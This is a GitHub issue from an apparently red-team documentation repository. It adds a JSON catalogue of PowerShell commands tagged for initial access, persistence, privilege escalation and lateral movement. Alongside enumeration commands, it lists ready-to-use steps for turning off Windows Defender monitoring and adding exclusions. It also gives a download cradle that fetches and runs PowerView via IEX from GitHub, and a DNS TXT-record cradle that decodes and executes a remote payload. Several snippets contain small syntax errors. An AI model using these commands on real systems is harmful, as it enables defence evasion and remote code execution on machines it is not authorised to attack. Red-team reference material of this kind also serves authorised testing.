search

Patrick-DE / RTT-Docs

Public repository for the techniques and tools shown on rtt.secdu.de
GNU Affero General Public License v3.0
1 stars 0 forks source link

New tool: PowerShell #100

Closed Patrick-DE closed 1 year ago

Patrick-DE commented 1 year ago 
{
  "name": "PowerShell",
  "phases": [
    "01. Initial Access",
    "03. Host Enumeration",
    "04. Persistence",
    "05. Privilege Escalation",
    "07. Lateral Movement"
  ],
  "category": "",
  "stealthy": false,
  "platforms": [
    "Windows"
  ],
  "source": "https://learn.microsoft.com/de-de/powershell/?view=powershell-7.3",
  "description": "PowerShell",
  "undetected": [],
  "detected": [],
  "content": "\n\n## [[LSA Protection]]\n`Get-WinEvent -FilterHashtable @{ LogName='system'; Id='12' ; ProviderName='Microsoft-Windows-Wininit' }`\n\n## [[RDP]]\n`Get-WinEvent -FilterHashtable @{ LogName='Microsoft-Windows-TerminalServices-RDPClient/Operational'; id='1024' } | select timecreated, message | ft -AutoSize -Wrap`\n\n## [[COM Hijacking]]\nList COM objects\n`gwmi Win32_COMSetting | ? {$_.progid } | sort | ft ProgId,Caption,InprocServer32`\n\nList COM Object Methods for WScript.Shell.1\n`$o = [activator]::CreateInstance([type]::GetTypeFromProgID((\"WScript.Shell.1\"))) | gm`\n\n## [[Unquoted Service Path]]\nGet ACLs of services\n```ps\npowershell Get-Acl -Path \"C:\\Program Files\\Vuln Services\" | fl\n  \nPath   : Microsoft.PowerShell.Core\\FileSystem::C:\\Program Files\\Vuln Services\nOwner  : BUILTIN\\Administrators\nGroup  : wkstn1\\None\nAccess : CREATOR OWNER Allow  FullControl\n NT AUTHORITY\\SYSTEM Allow  FullControl\n BUILTIN\\Administrators Allow  FullControl\n BUILTIN\\Users Allow  Write, ReadAndExecute, Synchronize\n NT SERVICE\\TrustedInstaller Allow  FullControl\n APPLICATION PACKAGE AUTHORITY\\ALL APPLICATION PACKAGES Allow  ReadAndExecute, Synchronize\n APPLICATION PACKAGE AUTHORITY\\ALL RESTRICTED APPLICATION PACKAGES Allow  ReadAndExecute, Synchronize\n```\n\n## [[Common Language Runtime (CLR) Versions]]\n```ps\ndir %WINDIR%\\Microsoft.Net\\Framework\\ /s /b | find \"System.dll\"\n\n[System.IO.File]::Exists(\"$env:windir\\Microsoft.Net\\Framework\\v2.0.50727\\System.dll\")\n\n[System.IO.File]::Exists(\"$env:windir\\Microsoft.Net\\Framework\\v4.0.30319 System.dll\")\n```\n\n",
  "commands": [
    {
      "id": "6183749c-eee5-42ca-a171-ac1b1a35a449",
      "name": "Check LSA Protection",
      "description": "",
      "tag": "",
      "results": [],
      "cmd": "Get-WinEvent -FilterHashtable @{ LogName='system'; Id='12' ; ProviderName='Microsoft-Windows-Wininit' }"
    },
    {
      "id": "a7a1f9d8-ead2-4ef3-a773-1bda67790647",
      "name": "Decode Base64",
      "description": "",
      "tag": "",
      "results": [],
      "cmd": "[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($str))"
    },
    {
      "id": "a8516fd7-ce4f-4c19-97c9-780aa299f594",
      "name": "Disable Defender",
      "description": "",
      "tag": "",
      "results": [],
      "references": ["https://github.com/evilmog/evilmog/wiki/DNS-Download-Cradle"],
      "cmd": "Set-MpPreference -DisableRealtimeMonitoring $true\nSet-MpPreference -DisableBehaviorMonitoring $true\nSet-MpPreference -DisableScriptScanning $true\nSet-MpPreference -DisableArchiveScanning $true",
      "requirements": {
        "tag": "PRIVS:ADMIN"
      }
    },
    {
      "id": "d246dc40-5194-4f1e-a4ca-208827e49e36",
      "name": "Encode Base64",
      "description": "",
      "tag": "",
      "results": [],
      "cmd": "[System.Convert]::ToBase64String([System.Text.Encoding]::Unicode.GetBytes($str))"
    },
    {
      "id": "48b78655-db1f-4da0-9d31-f90cc810eb3e",
      "name": "Get ACLs of services",
      "description": "",
      "tag": "",
      "results": [],
      "cmd": "powershell Get-Acl -Path \"C:\\Program Files\\Vuln Services\" | fl"
    },
    {
      "id": "bf3b2a29-c697-4835-aadd-02cf9a14dcbc",
      "name": "Get all COM objects via wmi",
      "description": "A lot of output",
      "tag": "",
      "results": [],
      "cmd": "gwmi Win32_COMSetting | ? {$_.progid } | sort | ft ProgId,Caption,InprocServer32"
    },
    {
      "id": "5c9766c7-293d-4110-bfeb-0aabfd061080",
      "name": "Get CLR versions",
      "description": "Get Common Language Runtime (CLR) versions",
      "tag": "",
      "results": [],
      "cmd": "cmd.exe /c dir %WINDIR%\\Microsoft.Net\\Framework\\ /s /b | find \"System.dll\"\n\n[System.IO.File]::Exists(\"$env:windir\\Microsoft.Net\\Framework\\v2.0.50727\\System.dll\")\n[System.IO.File]::Exists(\"$env:windir\\Microsoft.Net\\Framework\\v4.0.30319 System.dll\")"
    },
    {
      "id": "52121667-91db-4042-910a-ae02121b82f3",
      "name": "Get Defender Detections",
      "description": "",
      "tag": "",
      "results": [],
      "cmd": "Get-MpThreatDetection"
    },
    {
      "id": "c6a72c8f-0734-4a95-9dfd-241ac41591b5",
      "name": "Get Defender Exclusions",
      "description": "",
      "tag": "",
      "results": [],
      "cmd": "Get-MpPreference | Select-Object -ExpandProperty ExclusionPath",
      "requirements": {
        "tag": "PRIVS:ADMIN"
      }
    },
    {
      "id": "4e5c3ef8-0775-4d8e-af57-a82dc066e524",
      "name": "Get Defender Status",
      "description": "",
      "tag": "",
      "results": [],
      "cmd": "Get-MpComputerStatus\nGet-MpPreference"
    },
    {
      "id": "3c5b88d5-05d2-43bd-912a-d7025e4751f0",
      "name": "Get Imported Modules",
      "description": "",
      "tag": "",
      "results": [],
      "cmd": "Get-Module -All"
    },
    {
      "id": "94a5526d-cdc0-47e9-afd7-a14881beffe1",
      "name": "Get latest MDE Detection",
      "description": "",
      "tag": "",
      "results": [],
      "cmd": "Get-MpThreatDetection |sort $_.InitialDetectionTime |select -First 1"
    },
    {
      "id": "e6685b82-4fa3-4591-bc80-732a64a8cc28",
      "name": "Get methods of COM object ",
      "description": "List COM Object Methods for WScript.Shell.1",
      "tag": "",
      "results": [],
      "cmd": "[activator]::CreateInstance([type]::GetTypeFromProgID((\"WScript.Shell.1\"))) | gm"
    },
    {
      "id": "36c7d31c-865d-4e71-83fe-cd41b3560f42",
      "name": "Get MSSQL Servers",
      "description": "",
      "tag": "",
      "results": [],
      "cmd": "ADForestInfoRootDomain = ([System.DirectoryServices.ActiveDirectory.Forest]::GetCurrentForest()).RootDomain\n$ADForestInfoRootDomainDN = \"DC=\" + $ADForestInfoRootDomain -Replace(\"\\.\",',DC=')\n$ADDomainInfoLGCDN = 'GC://' + $ADForestInfoRootDomainDN\n$root = [ADSI]$ADDomainInfoLGCDN\n$ADSPNSearcher = new-Object System.DirectoryServices.DirectorySearcher($root,\"(serviceprincipalname=*sql*)\")\n$ADSPNSearcher.PageSize = 500\n$AllADSQLServerSPNs = $ADSPNSearcher.FindAll()"
    },
    {
      "id": "cc43d2fa-b951-4f09-b37f-91f34ea5bbaf",
      "name": "Get RDP Events",
      "description": "",
      "tag": "",
      "results": [],
      "cmd": "Get-WinEvent -FilterHashtable @{ LogName='Microsoft-Windows-TerminalServices-RDPClient/Operational'; id='1024' } | select timecreated, message | ft -AutoSize -Wrap"
    },
    {
      "id": "cfdc1559-6498-40c2-8bbe-e200e7a47ec1",
      "name": "Get Registry Entry",
      "description": "With the example of AppLocker and WDAC",
      "tag": "",
      "results": [],
      "cmd": "#APPLOCKER\nGet-ChildItem -Path 'HKLM:\\Software\\Policies\\Microsoft\\Windows\\SRPV2'\nGet-ChildItem -Path 'HKLM:\\System\\CurrentControlSet\\Control\\SRP\\GP'\nGet-ChildItem -Path \n#WDAC\n'HKLM:\\SOFTWARE\\Policies\\Microsoft\\Windows\\DeviceGuard -v DeployConfigCIPolicy'\nGet-ChildItem -Path 'HKLM:\\SOFTWARE\\Policies\\Microsoft\\Windows\\DeviceGuard -v ConfigCIPolicyFilePath'"
    },
    {
      "id": "7dc8490f-8454-4d39-83d5-43bcda1bc27c",
      "name": "Launch C# via PowerShell",
      "description": "",
      "tag": "",
      "results": [],
      "cmd": "$id = get-random\n$assemblies = (\"System.Core\",\"System.Xml.Linq\",\"System.Data\",\"System.Xml\", \"System.Data.DataSetExtensions\", \"Microsoft.CSharp\")\nAdd-Type -ReferencedAssemblies $assemblies -TypeDefinition $code -Language CSharp\n$code = @\"\nusing System;\nnamespace HelloWorld\n{\n\tpublic class Program$id\n\t{\n\t\tpublic static void Main(){\n\t\t\tConsole.WriteLine(\"Hello world!\");\n\t\t}\n\t}\n}\n\"@\n \nAdd-Type -TypeDefinition $code -Language CSharp\t\niex \"[HelloWorld.Program$id]::Main()\""
    },
    {
      "id": "7e1ff5f3-6e68-405c-81b5-64bba180e491",
      "name": "Load Github Script Remotely",
      "description": "Showed with an example of PowerView",
      "tag": "",
      "results": [],
      "cmd": "IEX(New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Recon/PowerView.ps1'); Find-GPOLocation -UserName Administrator;"
    },
    {
      "id": "91dc7ca7-51e5-414f-a6c7-37094cfa60e5",
      "name": "PS-Remoting",
      "description": "",
      "tag": "",
      "results": [],
      "cmd": "Invoke-Command -ComputerName Test1-Win2k16 -ScriptBlock{Get-LocalGroupMember -Name 'Administrators'}",
      "requirements": {
        "tag": "SERVICE:WINRM"
      }
    },
    {
      "id": "eb9dc6fa-f509-41ab-ab5c-33653b431bc4",
      "name": "Set Defender Exclusions",
      "description": "",
      "tag": "",
      "results": [],
      "cmd": "Set-MpPreference -ExclusionPath PATH\\TO\\FOLDER\nSet-MpPreference -ExclusionExtension docx\nSet-MpPreference -ExclusionProcess Process",
      "requirements": {
        "tag": "PRIVS:ADMIN"
      }
    },
    {
      "id": "0b63dd81-e89a-4934-b625-4ab767e81149",
      "name": "Trigger WSUS",
      "description": "",
      "tag": "",
      "results": [],
      "cmd": "$updateSession = New-Object -com \"Microsoft.Update.Session\"; $updates=$updateSession.CreateupdateSearcher().Search($criteria).Updates; wuauclt.exe /reportnow"
    },
    {
      "id": "3949f2c6-7e9a-4b65-91c4-657ef1766dce",
      "name": "Download cradle via TXT DNS records",
      "description": "",
      "tag": "",
      "results": [],
      "cmd": "$a='';$n=1..2;ForEach ($i in $n) { $a += ((resolve-dnsname -type txt $mydomain.org).strings) }; iex((System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($a))))"
    }
  ]
}